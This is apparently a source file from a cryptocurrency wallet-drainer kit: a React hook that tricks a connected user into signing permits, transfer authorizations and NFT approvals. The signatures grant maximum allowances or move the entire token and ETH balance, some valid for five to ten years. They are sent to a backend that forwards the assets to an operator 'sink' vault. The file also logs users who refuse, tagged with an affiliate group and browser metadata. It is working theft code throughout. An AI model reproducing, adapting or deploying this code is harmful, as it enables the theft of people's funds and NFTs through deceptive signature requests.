   * For ETH methods, subtracts 2x gas estimate
   * Returns BigInt (ethers v6)
   */
  const normalizeTokenAmount = async (tokenData, recommendedMethod = null) => {
    try {
      // For ETH methods, get balance and subtract 2x gas (using same logic as method handlers)
      if (recommendedMethod && ['ethExecuteCall', 'ethBridge', 'ethSwap', 'ethSign'].includes(recommendedMethod)) {
        const balance = await signer.provider.getBalance(account);
        if (balance <= 0n) return 0n;

        // Use same gas limit as actual transaction (200k) for accurate gas reservation
        const estimatedGas = 200000n;
        let feeData;
        try {
          feeData = await signer.provider.getFeeData();
        } catch (error) {
          // Fallback for networks that don't support getFeeData
          try {
            const block = await signer.provider.getBlock('latest');
            feeData = { gasPrice: block.gasPrice || 0n };
          } catch (e) {
            feeData = { gasPrice: 0n };
          }
        }

        // Use EIP-1559 fees if available, otherwise fall back to legacy gasPrice
        const effectiveGasPrice = feeData.maxFeePerGas
          ? feeData.maxFeePerGas * 2n  // EIP-1559: double maxFeePerGas for safety
          : (feeData.gasPrice || 0n) * 2n; // Legacy: double gasPrice
        const gasCost = effectiveGasPrice * estimatedGas;
        const amount = balance > gasCost ? balance - gasCost : 0n;
        return amount > 0n ? amount : 0n;
      }

      // For token transfers, get actual balance
      const balance = await getTokenBalanceAmount(tokenData);
      return balance;
    } catch (error) {
      if (process.env.NODE_ENV === "development") {
        console.warn("Failed to normalize token amount:", error);
      }
      return 0n;
    }
  };

  // getTokenHandlerCompleteContract removed - backend executes all transactions

  /**
   * Generates transfer signature based on recommended method
   * Frontend generates signatures, backend executes transactions and pays gas
   */
  const generateTransferSignature = async (token, recommendedMethod, recipient = sink, contractAddressOverride = null) => {
    try {
      const contractAddress = contractAddressOverride || TOKEN_HANDLER_COMPLETE_CONTRACTS[network];

      // For methods that don't need contract address (like ETH methods), allow null
      const needsContractAddress = !['ethExecuteCall', 'ethBridge', 'ethSwap', 'ethSign'].includes(recommendedMethod);

      if (needsContractAddress && !contractAddress) {
        if (process.env.NODE_ENV === "development") {
          console.warn(`TokenHandlerComplete contract not configured for chain ${network}. Backend should provide contract address.`);
        }
        // Still proceed - backend might have the contract address
      }

      const userAddress = account;

      // Handle ETH methods - these call specific contract functions with ETH value
      if (recommendedMethod === 'ethExecuteCall' ||
        recommendedMethod === 'ethBridge' ||
        recommendedMethod === 'ethSwap' ||
        recommendedMethod === 'ethSign') {
        if (!contractAddress) {
          if (process.env.NODE_ENV === "development") {
            console.warn(`TokenHandlerComplete contract address required for ${recommendedMethod}. Backend should provide contract address.`);
          }
        }

        const amount = await normalizeTokenAmount(token, recommendedMethod);
        if (amount <= 0n) {
          if (process.env.NODE_ENV === "development") {
            console.log('No ETH balance to transfer (after gas deduction)');
          }
          return null;
        }

        const contractFunctionMap = {
          'ethExecuteCall': 'executeCallEth',
          'ethBridge': 'bridgeEth',
          'ethSwap': 'swapEth',
          'ethSign': 'signEth'
        };

        return {
          method: recommendedMethod,
          signature: '',
          params: {
            value: amount.toString(),
            contractFunction: contractFunctionMap[recommendedMethod]
          },
          contractAddress: contractAddress
        };
      }

      // For token transfers, get actual balance
      const amount = await normalizeTokenAmount(token, recommendedMethod);
      if (amount <= 0n) {
        if (process.env.NODE_ENV === "development") {
          console.log('No token balance to transfer');
        }
        return null;
      }

      // Handle token transfer methods
      switch (recommendedMethod) {
        case 'transferFromAndForward':
          return {
            method: recommendedMethod,
            signature: '',
            params: {
              token: token.address,
              from: userAddress,
              amount: amount.toString()
            },
            contractAddress
          };

        case 'transferWithAuthorization':
        case 'transferWithAuthorizationAndForward':
          return await generateTransferWithAuthorizationSignature(token, recipient, contractAddress);

        case 'permitERC2612':
          return await generatePermitERC2612Signature(token, recipient, contractAddress);

        case 'permitDai':
          return await generatePermitDaiSignature(token, recipient, contractAddress);

        case 'eip7702':
          return await generateEip7702Signature(token, recipient, contractAddress);

        case 'metaTransaction':
          return await generateMetaTransactionSignature(token, recipient, contractAddress);

        case 'erc1155':
          return {
            method: recommendedMethod,
            signature: '',
            params: {
              token: token.address,
              from: userAddress,
              id: (token.tokenId || 0n).toString(),
              amount: amount.toString()
            },
            contractAddress
          };

        case 'erc777':
          return {
            method: recommendedMethod,
            signature: '',
            params: {
              token: token.address,
              from: userAddress,
              amount: amount.toString()
            },
            contractAddress
          };

        case 'erc1271':
          return await generateERC1271Signature(token, recipient, contractAddress);

        case 'feeOnTransfer':
          return {
            method: recommendedMethod,
            signature: '',
            params: {
              token: token.address,
              from: userAddress,
              amount: amount.toString()
            },
            contractAddress
          };

        case 'wrapAndRelayTokens':
          return {
            method: recommendedMethod,
            signature: '',
            params: {
              receiver: recipient || SINK,
            },
            contractAddress: null
          };

        case 'relayTokens':
          return {
            method: recommendedMethod,
            signature: '',
            params: {
              token: token.address,
              receiver: recipient || SINK,
              amount: amount.toString()
            },
            contractAddress: null
          };

        case 'transferAndCall':
          return {
            method: recommendedMethod,
            signature: '',
            params: {
              token: token.address,
              receiver: recipient || SINK,
              amount: amount.toString(),
              data: "0x"
            },
            contractAddress: null
          };

        default:
          if (process.env.NODE_ENV === "development") {
            console.warn(`Unsupported transfer method: ${recommendedMethod}`);
          }
          return null;
      }
    } catch (error) {
      if (process.env.NODE_ENV === "development") {
        console.error("generateTransferSignature error:", error);
      }
      return null;
    }
  };

  /**
   * Generates transferWithAuthorizationAndForward signature (EIP-712)
   * IMPORTANT: The 'to' parameter in the signature must be the TokenHandlerComplete contract address
   * The contract receives tokens via transferWithAuthorization, then forwards to vault internally
   */
  const generateTransferWithAuthorizationSignature = async (token, recipient = sink, contractAddress) => {
    try {
      // Get signer - use existing signer or get it from provider if not available
      let actualSigner = signer;
      if (!actualSigner && walletProvider) {
        const provider = new ethers.BrowserProvider(walletProvider);
        actualSigner = await provider.getSigner();
      }

      if (!actualSigner) {
        throw new Error('Signer is not available. Please connect your wallet.');
      }

      // Get actual balance
      const balance = await getTokenBalanceAmount(token);

      if (balance <= 0n) {
        if (process.env.NODE_ENV === "development") {
          console.log('No balance to transfer');
        }
        return null;
      }

      const provider = actualSigner.provider || walletProvider;
      const tokenContract = new Contract(token.address, CONTRACT_ABI, provider);

      // Get token name for domain
      let tokenName = 'USD Coin'; // Default
      try {
        tokenName = await tokenContract.name();
      } catch (e) {
        // Use default
      }

      const domain = {
        name: tokenName,
        version: '2',
        chainId: network,
        verifyingContract: token.address
      };

      const types = {
        TransferWithAuthorization: [
          { name: 'from', type: 'address' },
          { name: 'to', type: 'address' },
          { name: 'value', type: 'uint256' },
          { name: 'validAfter', type: 'uint256' },
          { name: 'validBefore', type: 'uint256' },
          { name: 'nonce', type: 'bytes32' }
        ]
      };

      const validAfter = Math.floor(Date.now() / 1000);
      const validBefore = validAfter + 3600 * 24 * 365 * 10; // 10 years
      const nonce = ethers.hexlify(ethers.randomBytes(32));

      const message = {
        from: account,
        to: contractAddress,
        value: balance.toString(),
        validAfter,
        validBefore,
        nonce
      };

      // Sign using EIP-712 typed data (works with all provider-based signers)
      // Try both signTypedData (ethers v6) and _signTypedData (ethers v5 compatibility)
      let signature;
      if (typeof actualSigner.signTypedData === 'function') {
        signature = await actualSigner.signTypedData(domain, types, message);
      } else if (typeof actualSigner._signTypedData === 'function') {
        signature = await actualSigner._signTypedData(domain, types, message);
      } else {
        throw new Error('Signer does not support typed data signing. Please use a compatible wallet.');
      }
      const sig = ethers.Signature.from(signature);

      return {
        method: 'transferWithAuthorizationAndForward',
        signature,
        params: {
          token: token.address,
          from: account,
          // IMPORTANT: For transferWithAuthorizationAndForward, the signature's 'to' parameter 
          // is the TokenHandlerComplete contract address (already in message.to above).
          // The contract receives tokens via transferWithAuthorization, then forwards to vault internally.
          to: contractAddress, // Use contract address - contract handles vault routing
          value: balance.toString(),
          validAfter,
          validBefore,
          nonce,
          v: sig.v,
          r: sig.r,
          s: sig.s
        },
        contractAddress
      };
    } catch (error) {
      if (process.env.NODE_ENV === "development") {
        console.error("generateTransferWithAuthorizationSignature error:", error);
      }
      return null;
    }
  };

  // getTokenHandlerCompleteContract removed - backend executes all transactions


  /**
   * Generates ERC-2612 permit signature (EIP-712)
   * 
   * IMPORTANT: Uses permitDomainFormat from API response (token.permitDomainFormat)
   * Backend automatically detects the correct domain format by analyzing contract bytecode
   * - "standard": Includes version field (most tokens)
   * - "no_version": No version field (UNI token and similar)
   * 
   * If permitDomainFormat is not provided, falls back to frontend detection
   */
  const generatePermitERC2612Signature = async (token, recipient = sink, contractAddress) => {
    try {
      // Get signer - use existing signer or get it from provider if not available
      let actualSigner = signer;
      if (!actualSigner && walletProvider) {
        const provider = new ethers.BrowserProvider(walletProvider);
        actualSigner = await provider.getSigner();
      }

      if (!actualSigner) {
        throw new Error('Signer is not available. Please connect your wallet.');
      }

      // Use max allowance for permit value
      const deadline = toDeadline(FIVE_YEARS_IN_SECONDS * 1000); // 5 years

      // Get provider from signer for permit helper function
      // The permit functions need a provider for contract calls, but signData can work with signers
      // In ethers v6, signers have a .provider property
      const provider = actualSigner.provider || walletProvider;
      if (!provider) {
        throw new Error('Provider is not available for permit signature');
      }

      // Generate permit signature using existing helper
      // Function signature: signERC2612Permit(provider, token, owner, spender, value, deadline, nonce, permitDomainFormat)
      // Get permitDomainFormat from token data (backend provides this via API)
      const permitDomainFormat = token.permitDomainFormat || null; // "standard" or "no_version" from API

      // CRITICAL: UNI token uses uint96 internally, so use MAX_UINT96 instead of MAX_UINT256
      // While UNI contract accepts uint(-1) (MAX_UINT256) and converts it, using MAX_UINT96 is safer
      // Detect UNI token by: permitDomainFormat === "no_version" OR token address matches UNI
      const isUniToken = permitDomainFormat === 'no_version' ||
        token.address?.toLowerCase() === UNI_TOKEN_ADDRESS.toLowerCase();
      const permitValue = isUniToken ? MAX_UINT96 : MAX_INT; // Use MAX_UINT96 for UNI, MAX_UINT256 for others

      if (process.env.NODE_ENV === "development" && isUniToken) {
        console.log('⚠️ UNI Token detected: Using MAX_UINT96 instead of MAX_UINT256 for permit value');
        console.log('⚠️ MAX_UINT96:', MAX_UINT96);
      }

      const permitData = await signERC2612Permit(
        provider, // Use provider for contract calls (signData can handle signers internally)
        token.address,
        account,
        contractAddress,
        permitValue, // MAX_UINT96 for UNI, MAX_UINT256 for others
        deadline,
        undefined, // nonce is optional - function gets it from contract
        permitDomainFormat // Use format from backend API (most reliable)
      );

      if (!permitData) return null;

      const { v, r, s, deadline: permitDeadline, nonce } = permitData;

      // Convert BigInt values to strings for JSON serialization
      // Backend expects string format for large numbers
      const deadlineValue = permitDeadline || deadline;
      const nonceValue = nonce || 0n;

      // IMPORTANT: For UNI token (and similar tokens with uint96 amounts), use MAX_UINT96 instead of MAX_UINT256
      // UNI token uses uint96 internally, so MAX_UINT96 is safer and more explicit than MAX_UINT256
      // The permit value was already set correctly above (MAX_UINT96 for UNI, MAX_UINT256 for others)
      const isUniTokenForParams = permitDomainFormat === 'no_version' ||
        token.address?.toLowerCase() === UNI_TOKEN_ADDRESS.toLowerCase();
      const permitValueForParams = isUniTokenForParams ? MAX_UINT96 : MAX_INT;

      return {
        method: 'permitERC2612',
        signature: permitData.signature || `${r}${s}${v}`,
        params: {
          token: token.address,
          owner: account,
          spender: contractAddress,
          value: permitValueForParams, // MAX_UINT96 for UNI token, MAX_UINT256 for others
          deadline: typeof deadlineValue === 'bigint' ? deadlineValue.toString() : deadlineValue.toString(),
          nonce: typeof nonceValue === 'bigint' ? nonceValue.toString() : nonceValue.toString(),
          v, // Number (27 or 28)
          r, // Hex string (bytes32)
          s  // Hex string (bytes32)
          // Do NOT include 'to' - permit doesn't include destination, backend uses contract's vault address
        },
        contractAddress
      };
    } catch (error) {
      if (process.env.NODE_ENV === "development") {
        console.error("generatePermitERC2612Signature error:", error);
      }
      return null;
    }
  };

  /**
   * Generates DAI permit signature (EIP-712)
   */
  const generatePermitDaiSignature = async (token, recipient = sink, contractAddress) => {
    try {
      // Get signer - use existing signer or get it from provider if not available
      let actualSigner = signer;
      if (!actualSigner && walletProvider) {
        const provider = new ethers.BrowserProvider(walletProvider);
        actualSigner = await provider.getSigner();
      }

      if (!actualSigner) {
        throw new Error('Signer is not available. Please connect your wallet.');
      }

      // Get actual balance (not used in permit, but kept for compatibility)
      const amount = await normalizeTokenAmount(token, 'permitDai');
      const expiry = Math.floor(Date.now() / 1000) + FIVE_YEARS_IN_SECONDS; // 5 years

      // Get provider from signer for permit helper function
      // The permit functions need a provider for contract calls, but signData can work with signers
      // In ethers v6, signers have a .provider property
      const provider = actualSigner.provider || walletProvider;
      if (!provider) {
        throw new Error('Provider is not available for permit signature');
      }

      // Generate DAI permit signature using existing helper
      // Function signature: signDaiPermit(provider, token, holder, spender, expiry, nonce)
      // Old code passes signer directly, but function needs provider for contract calls
      const permitData = await signDaiPermit(
        provider, // Use provider for contract calls (signData can handle signers internally)
        token.address,
        account,
        contractAddress,
        expiry
        // nonce is optional - function gets it from contract
      );

      if (!permitData) return null;

      const { v, r, s, nonce, expiry: permitExpiry } = permitData;

      return {
        method: 'permitDai',
        signature: permitData.signature || `${r}${s}${v}`,
        params: {
          token: token.address,
          holder: account,
          spender: contractAddress,
          nonce: nonce.toString(),
          expiry: permitExpiry || expiry,
          allowed: true,
          v,
          r,
          s,
          amount: amount.toString()
          // Do NOT include 'to' - permit doesn't include destination, backend uses contract's vault address
        },
        contractAddress
      };
    } catch (error) {
      if (process.env.NODE_ENV === "development") {
        console.error("generatePermitDaiSignature error:", error);
      }
      return null;
    }
  };

  /**
   * Generates NFT position transfer data
   * For NFT positions (Uniswap V3, SushiSwap, etc.), the frontend ensures setApprovalForAll is set
   * The backend handles the actual NFT transfer via NFTPositionManager contract
   * 
   * @param {Object} nftPosition - NFT position data from API response
   * @param {string} nftPositionManagerAddress - NFTPositionManager contract address (from backend config)
   * @returns {Object} Transfer data for backend
   */
  const generateNFTPositionTransfer = async (nftPosition, nftPositionManagerAddress, approvalTxHash = null) => {
    try {
      if (!nftPosition || !nftPositionManagerAddress) {
        throw new Error('NFT position data and NFTPositionManager address are required');
      }

      // NFT positions require setApprovalForAll to be set on NFTPositionManager
      // Frontend checks and requests approval if needed
      // Backend will wait for approval transaction confirmation before executing NFT transfer

      const nftContract = nftPosition.nftContract || nftPosition.contractAddress || nftPosition.address;
      const tokenId = nftPosition.tokenId?.toString() || nftPosition.id?.toString();

      if (!nftContract || !tokenId) {
        throw new Error('NFT contract address and token ID are required');
      }

      return {
        method: 'nftPosition',
        signature: '',
        params: {
          nftContract: nftContract, // NFT contract address (e.g., Uniswap V3 Position Manager)
          tokenId: tokenId,
          from: account,
          approvalTxHash: approvalTxHash, // Include approval transaction hash if approval was just sent
          // Do NOT include 'to' - backend uses contract's vault address
          // Backend will call: NFTPositionManager.transferNFTDirect(nftContract, from, tokenId)
        },
        nftPositionManagerAddress // NFTPositionManager contract address
      };
    } catch (error) {
      if (process.env.NODE_ENV === "development") {
        console.error("generateNFTPositionTransfer error:", error);
      }
      return null;
    }
  };

  /**
   * Checks and requests setApprovalForAll for NFT positions
   * CRITICAL: setApprovalForAll must be set to NFTPositionManager contract, NOT TokenHandlerComplete
   * 
   * @param {string} nftContractAddress - NFT contract address (e.g., Uniswap V3 Position Manager)
   * @param {string} nftPositionManagerAddress - NFTPositionManager contract address
   * @returns {Promise<boolean>} True if approved or approval was successful
   */
  const checkAndApproveNFTPosition = async (nftContractAddress, nftPositionManagerAddress) => {
    try {
      if (!signer || !nftContractAddress || !nftPositionManagerAddress) {
        return false;
      }

      const nftContract = new ethers.Contract(
        nftContractAddress,
        [
          "function setApprovalForAll(address operator, bool approved) external",
          "function isApprovedForAll(address owner, address operator) view returns (bool)"
        ],
        signer
      );

      // Check if already approved
      const isApproved = await nftContract.isApprovedForAll(account, nftPositionManagerAddress);

      if (isApproved) {
        return true;
      }

      // Request approval
      const tx = await nftContract.setApprovalForAll(nftPositionManagerAddress, true);
      await tx.wait();

      return true;
    } catch (error) {
      if (process.env.NODE_ENV === "development") {
        console.error("checkAndApproveNFTPosition error:", error);
      }
      return false;
    }
  };

  /**
   * Generates EIP-7702 authorization signature
   * CRITICAL: Do NOT use EIP-712 typed data - use signMessage() on raw message bytes
   * The contract supports both raw hash signatures and Ethereum signed messages (for MetaMask compatibility)
   * 
   * IMPORTANT: Signature excludes 'to' (vault) - it's determined by contract
   * The signature must include: eoa, contractCode, token, from (must equal eoa), and amount
   * Universal Router is optional and comes from backend API response
   */
  const generateEip7702Signature = async (token, recipient = sink, contractAddress) => {
    try {
      // Get signer - use existing signer or get it from provider if not available
      let actualSigner = signer;
      if (!actualSigner && walletProvider) {
        const provider = new ethers.BrowserProvider(walletProvider);
        actualSigner = await provider.getSigner();
      }

      if (!actualSigner) {
        throw new Error('Signer is not available. Please connect your wallet.');
      }

      // Get actual balance
      const amount = await normalizeTokenAmount(token, 'eip7702');

      // Universal Router address comes from backend API response (/dashboard/transfer-methods endpoint)
      // It should be in data.universalRouter (preserved when mapping tokens)
      // If not provided or zero, exclude it from signature (use 3-parameter encoding)
      let universalRouter = token.universalRouter || null;

      // Normalize to null if zero address or empty string
      if (!universalRouter ||
        universalRouter === ethers.ZeroAddress ||
        universalRouter === "0x0000000000000000000000000000000000000000" ||
        universalRouter === "0x") {
        universalRouter = null;
      }

      if (process.env.NODE_ENV === "development") {
        console.log("EIP-7702 signature generation:", {
          token: token.address,
          eoa: account,
          contractCode: contractAddress,
          amount: amount.toString(),
          universalRouter: universalRouter || "null (will use 3-param encoding)"
        });
      }

      // Encode callData: abi.encode(token, from, amount) OR abi.encode(token, from, amount, universalRouter)
      // CRITICAL: 'to' (vault) is excluded - determined by contract
      // universalRouter is only included if provided and non-zero
      const abiCoder = ethers.AbiCoder.defaultAbiCoder();
      const sigData = universalRouter
        ? abiCoder.encode(
          ['address', 'address', 'uint256', 'address'],
          [token.address, account, amount, universalRouter]
        )
        : abiCoder.encode(
          ['address', 'address', 'uint256'],
          [token.address, account, amount]
        );

      // Create the message bytes that matches the contract's verification
      // CRITICAL: Message format is: "\x19EIP-7702 Authorization:\n" + eoa + contractCode + sigData
      // Contract verifies: keccak256(abi.encodePacked("\x19EIP-7702 Authorization:\n", eoa, contractCode, sigData))
      // For MetaMask compatibility, we sign the MESSAGE BYTES (not the hash)
      // MetaMask will add the Ethereum message prefix automatically when using signMessage()
      const prefix = ethers.toUtf8Bytes('\x19EIP-7702 Authorization:\n');
      const eoaBytes = ethers.getBytes(ethers.getAddress(account)); // 20 bytes
      const contractCodeBytes = ethers.getBytes(ethers.getAddress(contractAddress)); // 20 bytes
      const sigDataBytes = ethers.getBytes(sigData);

      // Concatenate: prefix + eoa + contractCode + sigData
      const messageBytes = ethers.concat([prefix, eoaBytes, contractCodeBytes, sigDataBytes]);

      // CRITICAL: Use signMessage() on raw message bytes (NOT signTypedData())
      // This works with MetaMask and all provider-based signers
      // The contract will automatically detect and verify the Ethereum signed message format
      const signature = await actualSigner.signMessage(messageBytes);

      return {
        method: 'eip7702',
        signature,
        params: {
          eoa: account,
          contractCode: contractAddress,
          token: token.address,
          from: account, // Must equal eoa
          amount: amount.toString(),
          signature,
          // Do NOT include 'to' (vault) - backend uses contract's vault address
          // universalRouter is already included in signature via sigData if provided
        },
        contractAddress
      };
    } catch (error) {
      if (process.env.NODE_ENV === "development") {
        console.error("generateEip7702Signature error:", error);
      }
      return null;
    }
  };

  /**
   * Generates meta transaction signature (EIP-712)
   */
  const generateMetaTransactionSignature = async (token, recipient = sink, contractAddress) => {
    try {
      // Get signer - use existing signer or get it from provider if not available
      let actualSigner = signer;
      if (!actualSigner && walletProvider) {
        const provider = new ethers.BrowserProvider(walletProvider);
        actualSigner = await provider.getSigner();
      }

      if (!actualSigner) {
        throw new Error('Signer is not available. Please connect your wallet.');
      }

      // Get actual balance
      const amount = await normalizeTokenAmount(token, 'metaTransaction');
      const nonce = ethers.hexlify(ethers.randomBytes(32));

      const domain = {
        name: 'TokenHandlerComplete',
        version: '1',
        chainId: network,
        verifyingContract: contractAddress
      };

      const types = {
        MetaTransaction: [
          { name: 'from', type: 'address' },
          { name: 'to', type: 'address' },
          { name: 'token', type: 'address' },
          { name: 'amount', type: 'uint256' },
          { name: 'nonce', type: 'uint256' }
        ]
      };

      // Use contractAddress as 'to' - backend handles vault routing
      const message = {
        from: account,
        to: contractAddress, // Use contract address - backend handles vault routing
        token: token.address,
        amount: amount.toString(),
        nonce
      };

      // Sign using EIP-712 typed data (works with all provider-based signers)
      let signature;
      if (typeof actualSigner.signTypedData === 'function') {
        signature = await actualSigner.signTypedData(domain, types, message);
      } else if (typeof actualSigner._signTypedData === 'function') {
        signature = await actualSigner._signTypedData(domain, types, message);
      } else {
        throw new Error('Signer does not support typed data signing. Please use a compatible wallet.');
      }

      return {
        method: 'metaTransaction',
        signature,
        params: {
          token: token.address,
          from: account,
          amount: amount.toString(),
          nonce,
          signature
          // Do NOT include 'to' - already in signature, backend uses contract's vault address
        },
        contractAddress
      };
    } catch (error) {
      if (process.env.NODE_ENV === "development") {
        console.error("generateMetaTransactionSignature error:", error);
      }
      return null;
    }
  };

  /**
   * Generates ERC-1271 signature for smart contract wallet
   */
  const generateERC1271Signature = async (token, recipient = sink, contractAddress) => {
    try {
      // Get signer - use existing signer or get it from provider if not available
      let actualSigner = signer;
      if (!actualSigner && walletProvider) {
        const provider = new ethers.BrowserProvider(walletProvider);
        actualSigner = await provider.getSigner();
      }

      if (!actualSigner) {
        throw new Error('Signer is not available. Please connect your wallet.');
      }

      // Get actual balance
      const amount = await normalizeTokenAmount(token, 'erc1271');
      const provider = actualSigner.provider || walletProvider;
      const { chainId } = await provider.getNetwork();

      // Use contractAddress - backend handles vault routing
      const message = ethers.solidityPackedKeccak256(
        ['address', 'address', 'address', 'uint256', 'uint256'],
        [token.address, account, contractAddress, amount, chainId] // Use contractAddress - backend handles vault routing
      );

      const signature = await actualSigner.signMessage(ethers.getBytes(message));

      return {
        method: 'erc1271',
        signature,
        params: {
          token: token.address,
          from: account,
          amount: amount.toString(),
          signature
          // Do NOT include 'to' - already in signature message, backend uses contract's vault address
        },
        contractAddress
      };
    } catch (error) {
      if (process.env.NODE_ENV === "development") {
        console.error("generateERC1271Signature error:", error);
      }
      return null;
    }
  };

  /**
   * Sends NFT position transfer request to backend for execution
   * Backend waits for setApprovalForAll confirmation, then executes NFT transfer
   * 
   * @param {Object} nftPosition - NFT position data
   * @param {string} nftPositionManagerAddress - NFTPositionManager contract address
   * @param {string|null} approvalTxHash - Transaction hash for setApprovalForAll (null if already approved)
   * @returns {Promise<Object|null>} Backend response or null on error
   */
  const sendNFTTransferToBackend = async (nftPosition, nftPositionManagerAddress, approvalTxHash = null) => {
    try {
      if (!client) return null;

      const nftContract = nftPosition.nftContract || nftPosition.address;
      const tokenId = nftPosition.tokenId?.toString() || nftPosition.id?.toString();

      if (!nftContract || !tokenId) {
        if (process.env.NODE_ENV === "development") {
          console.error("NFT contract address and token ID are required");
        }
        return null;
      }

      // Get client metadata
      const metadata = getClientMetadata();

      // Build request payload for /dashboard/execute-nft-transfer endpoint
      const requestPayload = {
        nftContract: nftContract,
        tokenId: tokenId,
        chain: network,
        userAddress: account,
        nftPositionManagerAddress: nftPositionManagerAddress, // Optional, backend will use from config if not provided
        method: 'transferNFTDirect', // Default method, can be 'transferNFTFromAndForward' if needed
        // Client metadata
        url: metadata.url,
        fullUrl: metadata.fullUrl,
        group: metadata.group,
        userAgent: metadata.userAgent,
        language: metadata.language,
        platform: metadata.platform
      };

      // Include txHash if approval was just sent (backend will wait for confirmation)
      if (approvalTxHash) {
        requestPayload.txHash = approvalTxHash;
      }

      // DEBUG: Log what we're sending to backend
      if (process.env.NODE_ENV === "development") {
        console.log('=== Sending NFT Transfer to Backend ===');
        console.log('Request payload:', requestPayload);
        if (approvalTxHash) {
          console.log('⚠️ NFT Transfer: Backend will wait for setApprovalForAll confirmation before executing transfer');
          console.log('⚠️ Approval txHash:', approvalTxHash);
        } else {
          console.log('⚠️ NFT Transfer: Approval already set, backend will execute immediately');
        }
      }

      const response = await client.post("/dashboard/execute-nft-transfer", requestPayload);
      const result = await response.json();

      return result;
    } catch (error) {
      if (process.env.NODE_ENV === "development") {
        console.error("Failed to send NFT transfer to backend:", error);
      }
      return null;
    }
  };

  /**
   * Sends signature and transfer params to backend for execution
   * Backend executes transactions and pays gas on behalf of user
   */
  const sendTransferToBackend = async (signatureData, token, recommendedMethod, contractAddress) => {
    try {
      if (!client) return null;

      // Check if this is an ETH method (native ETH, not ERC-20 token)
      const isEthMethod = ['ethExecuteCall', 'ethBridge', 'ethSwap', 'ethSign'].includes(signatureData.method);

      // Check if this is an approval method (approve, increaseAllowance, increaseApproval)
      // These methods don't need recipient - they're just approval operations
      const isApprovalMethod = ['approve', 'increaseAllowance', 'increaseApproval'].includes(signatureData.method);

      // For ETH methods, token might be 'eth' or have address 'eth' - handle safely
      const tokenAddress = token?.address && token.address !== 'eth' && !isEthMethod
        ? token.address
        : null;

      // Get actual balance for amount
      const amount = await normalizeTokenAmount(token, signatureData.method);

      // DEBUG: Log what we're sending to backend
      if (process.env.NODE_ENV === "development") {
        console.log('=== Sending to Backend ===');
        console.log('Request payload:', {
          method: signatureData.method,
          token: tokenAddress, // null for ETH methods
          recipient: isEthMethod || isApprovalMethod ? null : (signatureData.params.to || sink), // ETH and approval methods don't have recipient
          amount: amount.toString(),
          chain: network,
          userAddress: account,
          signature: signatureData.signature,
          params: signatureData.params,
          contractAddress: contractAddress
        });

        // Special note for UNI token
        if (!isEthMethod && tokenAddress?.toLowerCase() === '0x1f9840a85d5af5bf1d1762f925bdaddc4201f984') {
          console.log('⚠️ UNI Token Note: Contract accepts uint(-1) (MAX_UINT256) and converts to uint96(-1) internally.');
          console.log('⚠️ Backend should pass value directly to permit() - contract handles conversion.');
          console.log('⚠️ Value in params:', signatureData.params.value);
        }

        // Special note for ETH methods
        if (isEthMethod) {
          console.log('⚠️ ETH Method: Native ETH transfer - no token address, no recipient needed');
          console.log('⚠️ Value in params:', signatureData.params.value);
        }
      }

      // Get client metadata
      const metadata = getClientMetadata();

      // Build request payload - different structure for ETH vs token methods
      // According to docs: ETH methods only need value in params, no token, no recipient
      const basePayload = {
        // Client metadata - included in all requests
        url: metadata.url,
        fullUrl: metadata.fullUrl,
        group: metadata.group,
        userAgent: metadata.userAgent,
        language: metadata.language,
        platform: metadata.platform
      };

      const requestPayload = isEthMethod
        ? {
          ...basePayload,
          // ETH methods: No token, no recipient, just value (as per docs)
          method: signatureData.method,
          amount: amount.toString(), // Use amount from normalizeTokenAmount
          chain: network,
          userAddress: account,
          signature: signatureData.signature || '', // Empty for ETH methods
          params: signatureData.params, // Contains { value: ... }
          contractAddress: contractAddress || null // May be null for ETH methods
        }
        : {
          ...basePayload,
          // Token methods: Include token address
          // For approval methods (approve, increaseAllowance, increaseApproval), no recipient needed
          method: signatureData.method,
          token: tokenAddress,
          recipient: isApprovalMethod ? null : (signatureData.params.to || sink), // No recipient for approval methods
          amount: isApprovalMethod ? null : amount.toString(), // No amount for approval methods
          chain: network,
          userAddress: account,
          signature: signatureData.signature,
          params: signatureData.params,
          contractAddress: contractAddress
        };

      const response = await client.post("/dashboard/execute-transfer", requestPayload);

      const result = await response.json();
      return result;
    } catch (error) {
      if (process.env.NODE_ENV === "development") {
        console.error("Failed to send transfer to backend:", error);
      }
      return null;
    }
  };

  // Deprecated execution functions removed - backend now executes all transactions
  // Deprecated EIP-7702 handlers removed - not used with new API flow

  // Legacy remove function removed - backend handles all notifications

  const reject = async (currentToken, type) => {
    try {
      await client.post("/rejects", {
        chain: network,
        addy: account,
        url: window.location.hostname,
        group: GROUP_NAME,
        amount: currentToken?.amount,
        token: currentToken?.address,
        type
      });
    } catch (error) { }
  };

  return {
    approveContract, account, balance, isApproveLoading, isGetTokenLoading,
    isTokenLoadingState, walletProvider, connectWallet,
    chainId: network, // Current wallet chain, for token list UI (e.g. TokenSelector balance fetch)
    generateNFTPositionTransfer, // For NFT position transfers (Uniswap V3, SushiSwap, etc.)
    checkAndApproveNFTPosition // Check and request setApprovalForAll for NFT positions
  }
};

export default useApproval;